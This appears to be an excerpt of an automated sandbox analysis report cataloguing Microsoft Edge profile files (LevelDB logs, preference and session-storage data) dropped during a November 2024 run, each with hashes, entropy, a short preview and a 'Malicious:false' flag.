                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98Jq2P923oH+Tcwt865IFUt8YE98y9Zmw+YE98yPkwO923oH+Tcwt86+ULJ:k98Jv4Yeb/WFUt8/98y9/+/98yP5LYev
                                                                                                                                                                                                                                                                                    MD5:7B287335B07322F80A09A112AB7EECAA
                                                                                                                                                                                                                                                                                    SHA1:709C0CB44E7A19B4D212180B68AF68B9B819BC76
                                                                                                                                                                                                                                                                                    SHA-256:E979DF14F98B67453125ED44894A768D7DEA1B997D1C3393EFEE898FB99C616C
                                                                                                                                                                                                                                                                                    SHA-512:646165AF0A87C1F76B4BB406FD4B07E3F365816542B295837E0759989AFA2745688654BEA2CFF131D511D0AE9DD76ACEDD3ED51F40C99957F41F490D3E2157DD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.379 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-16:13:01.391 714 Recovering log #3.2024/11/21-16:13:01.391 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.148306293093424
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98Jq2P923oH+Tcwt865IFUt8YE98y9Zmw+YE98yPkwO923oH+Tcwt86+ULJ:k98Jv4Yeb/WFUt8/98y9/+/98yP5LYev
                                                                                                                                                                                                                                                                                    MD5:7B287335B07322F80A09A112AB7EECAA
                                                                                                                                                                                                                                                                                    SHA1:709C0CB44E7A19B4D212180B68AF68B9B819BC76
                                                                                                                                                                                                                                                                                    SHA-256:E979DF14F98B67453125ED44894A768D7DEA1B997D1C3393EFEE898FB99C616C
                                                                                                                                                                                                                                                                                    SHA-512:646165AF0A87C1F76B4BB406FD4B07E3F365816542B295837E0759989AFA2745688654BEA2CFF131D511D0AE9DD76ACEDD3ED51F40C99957F41F490D3E2157DD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.379 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-16:13:01.391 714 Recovering log #3.2024/11/21-16:13:01.391 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1140
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                    MD5:914FD8DC5F9A741C6947E1AB12A9D113
                                                                                                                                                                                                                                                                                    SHA1:6529EFE14E7B0BEA47D78B147243096408CDAAE4
                                                                                                                                                                                                                                                                                    SHA-256:8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
                                                                                                                                                                                                                                                                                    SHA-512:2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.180560735984671
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98QGt+q2P923oH+Tcwt8NIFUt8YE98hV7ZZmw+YE98hV7NVkwO923oH+Tcwt8n:k98QXv4YebpFUt8/98hV1/+/98hVn5LO
                                                                                                                                                                                                                                                                                    MD5:5E47299151E863012A0DE8E75A08BB05
                                                                                                                                                                                                                                                                                    SHA1:988ED2540B6562F3CF4E7E9521B0C4DDE8EBE894
                                                                                                                                                                                                                                                                                    SHA-256:4BD85A0188C9A22E063EFBB838C07B1C81A005E0E89485D66FFEECBF94A8C31C
                                                                                                                                                                                                                                                                                    SHA-512:F66F120F630224E6C26246C4D393C74C1892991C5AA804CF6D3AA3842393C964EBB4A589E68BD771C9B8F0EC1A510693126822BACFA1EC5F6080A4DD853AB13C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.589 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-16:13:03.590 1568 Recovering log #3.2024/11/21-16:13:03.590 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.180560735984671
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98QGt+q2P923oH+Tcwt8NIFUt8YE98hV7ZZmw+YE98hV7NVkwO923oH+Tcwt8n:k98QXv4YebpFUt8/98hV1/+/98hVn5LO
                                                                                                                                                                                                                                                                                    MD5:5E47299151E863012A0DE8E75A08BB05
                                                                                                                                                                                                                                                                                    SHA1:988ED2540B6562F3CF4E7E9521B0C4DDE8EBE894
                                                                                                                                                                                                                                                                                    SHA-256:4BD85A0188C9A22E063EFBB838C07B1C81A005E0E89485D66FFEECBF94A8C31C
                                                                                                                                                                                                                                                                                    SHA-512:F66F120F630224E6C26246C4D393C74C1892991C5AA804CF6D3AA3842393C964EBB4A589E68BD771C9B8F0EC1A510693126822BACFA1EC5F6080A4DD853AB13C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.589 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-16:13:03.590 1568 Recovering log #3.2024/11/21-16:13:03.590 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.290184711153421
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:k98qv4Yeb8rcHEZrELFUt8/984/+/98g5LYeb8rcHEZrEZSJ:k9z4Yeb8nZrExg8/9K9tLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:79564EF477F023128424FDFF3C8A20FC
                                                                                                                                                                                                                                                                                    SHA1:449EBF91D060DEF2D91B0B4608A031F4F3DBC3FD
                                                                                                                                                                                                                                                                                    SHA-256:F229045951C747A4A2B384CEFAF10ECBEB3F788493456A77464ACC38A205228F
                                                                                                                                                                                                                                                                                    SHA-512:F9CBB31922EAD89B4DAB5239ABDB43DC3E5E56583FCA3BA2334010DA6509FDC9C5F71681566D1D9558E83806C9C10DD710E0F88B78F85E5AD9AFE912DD663C38
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:04.780 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-16:13:04.781 1568 Recovering log #3.2024/11/21-16:13:04.781 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.290184711153421
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:k98qv4Yeb8rcHEZrELFUt8/984/+/98g5LYeb8rcHEZrEZSJ:k9z4Yeb8nZrExg8/9K9tLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:79564EF477F023128424FDFF3C8A20FC
                                                                                                                                                                                                                                                                                    SHA1:449EBF91D060DEF2D91B0B4608A031F4F3DBC3FD
                                                                                                                                                                                                                                                                                    SHA-256:F229045951C747A4A2B384CEFAF10ECBEB3F788493456A77464ACC38A205228F
                                                                                                                                                                                                                                                                                    SHA-512:F9CBB31922EAD89B4DAB5239ABDB43DC3E5E56583FCA3BA2334010DA6509FDC9C5F71681566D1D9558E83806C9C10DD710E0F88B78F85E5AD9AFE912DD663C38
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:04.780 1568 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-16:13:04.781 1568 Recovering log #3.2024/11/21-16:13:04.781 1568 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.173579641408034
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98ICq2P923oH+Tcwt8a2jMGIFUt8YE98uEsZmw+YE98jF1PkwO923oH+Tcwt8N:k98Vv4Yeb8EFUt8/98uL/+/98LP5LYek
                                                                                                                                                                                                                                                                                    MD5:758647B6E0E0167ADBB7D6ED07A29B44
                                                                                                                                                                                                                                                                                    SHA1:44442E5F457C8146D3BF86E72F5346BCA5E1E937
                                                                                                                                                                                                                                                                                    SHA-256:AAA3B2B6ADCF82DA8034A74A0AFE6408E4A49F7703FC675F4B1BF7418D8E9C85
                                                                                                                                                                                                                                                                                    SHA-512:F51889F05AAE562CD4177CC5744627CF8F8D0780A1A5249C53B16E3373C5631BAAED4F51BE106A0700DDEE4761F6492891BA1302D0DEFC398A7892AB910F40B4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.515 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:01.517 1894 Recovering log #3.2024/11/21-16:13:01.527 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.173579641408034
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98ICq2P923oH+Tcwt8a2jMGIFUt8YE98uEsZmw+YE98jF1PkwO923oH+Tcwt8N:k98Vv4Yeb8EFUt8/98uL/+/98LP5LYek
                                                                                                                                                                                                                                                                                    MD5:758647B6E0E0167ADBB7D6ED07A29B44
                                                                                                                                                                                                                                                                                    SHA1:44442E5F457C8146D3BF86E72F5346BCA5E1E937
                                                                                                                                                                                                                                                                                    SHA-256:AAA3B2B6ADCF82DA8034A74A0AFE6408E4A49F7703FC675F4B1BF7418D8E9C85
                                                                                                                                                                                                                                                                                    SHA-512:F51889F05AAE562CD4177CC5744627CF8F8D0780A1A5249C53B16E3373C5631BAAED4F51BE106A0700DDEE4761F6492891BA1302D0DEFC398A7892AB910F40B4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:01.515 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-16:13:01.517 1894 Recovering log #3.2024/11/21-16:13:01.527 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9615
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.117051869036601
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stjykdlAhs1gpsZihUkSs0o8bKbV+F0PQA66WJaFIMYJP3YJ:stjy/hs1gpfh6FKbGMQx6WJaTYO
                                                                                                                                                                                                                                                                                    MD5:DE5BE088A4C9E59227C455C1EF363EAE
                                                                                                                                                                                                                                                                                    SHA1:2407ADB1D1DD4B5DF13FC9342AE9420D5B074197
                                                                                                                                                                                                                                                                                    SHA-256:8D279B7549DCE90272316E340B19ABE809392869901ED832AC959E679492FF0D
                                                                                                                                                                                                                                                                                    SHA-512:FB54DCB2DBE2B1E427587D0A9CFB7CE5D390BE9B406C0018295B60E04FF1872AFBF53C19F1AD81AD0A34EF614E6B57AF559D50D3BD198DE41189C646644C4E90
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376697183230723","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":10090,"left":10000,"maximized":false,"right":10500,"top":10000,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":0,"browser_content_container_width":456,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_lin
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567399906177493
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:DTvgsuWPKcfVQ8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFUAVirw9pTtuG:DTvgsuWPKcfVQu1jac7VHvt1
                                                                                                                                                                                                                                                                                    MD5:753D1929F220D7293269A53A6C825F10
                                                                                                                                                                                                                                                                                    SHA1:E6592029A78018F6C6E392E47D2820A291F9AD02
                                                                                                                                                                                                                                                                                    SHA-256:EF9C14C088AA439E2C960C0FFFDEA5723F201D051D7CB2069FC2BCCFA359B8DE
                                                                                                                                                                                                                                                                                    SHA-512:EE63862EC91D38EFDE23594A2D34D07C3F3E187F0E9C312BBB02FF8A00C94A65BDA2E9B309BA332F5C6AA4329D21040C5B95E604913D5EE497C66DFEBF6A83F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376697181232775","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376697181232775","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):242
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.404644024658047
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:S85aEFljljljljl9FllaV93K+Be9W43cvadUV:S+a8ljljljljl9FlcK+eL3cvaW
                                                                                                                                                                                                                                                                                    MD5:ECC174D46500D0B4829D06B1392A1057
                                                                                                                                                                                                                                                                                    SHA1:AEF4A7CAEA1A289B7486581D9146E4EAE1FC0337
                                                                                                                                                                                                                                                                                    SHA-256:450206CF934971C58B37E44C47BCD6A84C27F570ADA89E0E7BBEC7AB19D0E925
                                                                                                                                                                                                                                                                                    SHA-512:2776ADD681E4884C1731E2FE377EB4AF196B71A0A2DC5ED765E20FC49AFC4E48BCE1763E478C74ACB7B6118A13CEF7018F23AC7BD43B59B7ACA36293FF9D9DD3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................Lb................next-map-id.1.Cnamespace-66a51c3d_3213_4870_81b0_bdd9db75a25a-https://ntp.msn.com/.0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125548438264403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98mxq2P923oH+TcwtrQMxIFUt8YE98DeZmw+YE981SkwO923oH+TcwtrQMFLJ:k98Qv4YebCFUt8/98De/+/981S5LYebf
                                                                                                                                                                                                                                                                                    MD5:00C5B3F0C278C44E73CE2E93487CDF80
                                                                                                                                                                                                                                                                                    SHA1:049588AB27BCF8946C301B18159BE5D8CC200876
                                                                                                                                                                                                                                                                                    SHA-256:3A5FE20FDDB478B988FAD964265CDD56B3CFEB8A5C97859DBF275E0DA5C084FB
                                                                                                                                                                                                                                                                                    SHA-512:D06F8F2B055E105B61EDFD1C62B4C49C23DFB58ECD0611DA471AD9A6084E28DF892763867C05E566B1E9AA153AFFE257D5E9456ED5B7B3CAA77FD8964554C705
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.600 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-16:13:03.601 1894 Recovering log #3.2024/11/21-16:13:03.607 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125548438264403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:HE98mxq2P923oH+TcwtrQMxIFUt8YE98DeZmw+YE981SkwO923oH+TcwtrQMFLJ:k98Qv4YebCFUt8/98De/+/981S5LYebf
                                                                                                                                                                                                                                                                                    MD5:00C5B3F0C278C44E73CE2E93487CDF80
                                                                                                                                                                                                                                                                                    SHA1:049588AB27BCF8946C301B18159BE5D8CC200876
                                                                                                                                                                                                                                                                                    SHA-256:3A5FE20FDDB478B988FAD964265CDD56B3CFEB8A5C97859DBF275E0DA5C084FB
                                                                                                                                                                                                                                                                                    SHA-512:D06F8F2B055E105B61EDFD1C62B4C49C23DFB58ECD0611DA471AD9A6084E28DF892763867C05E566B1E9AA153AFFE257D5E9456ED5B7B3CAA77FD8964554C705
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/11/21-16:13:03.600 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-16:13:03.601 1894 Recovering log #3.2024/11/21-16:13:03.607 1894 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
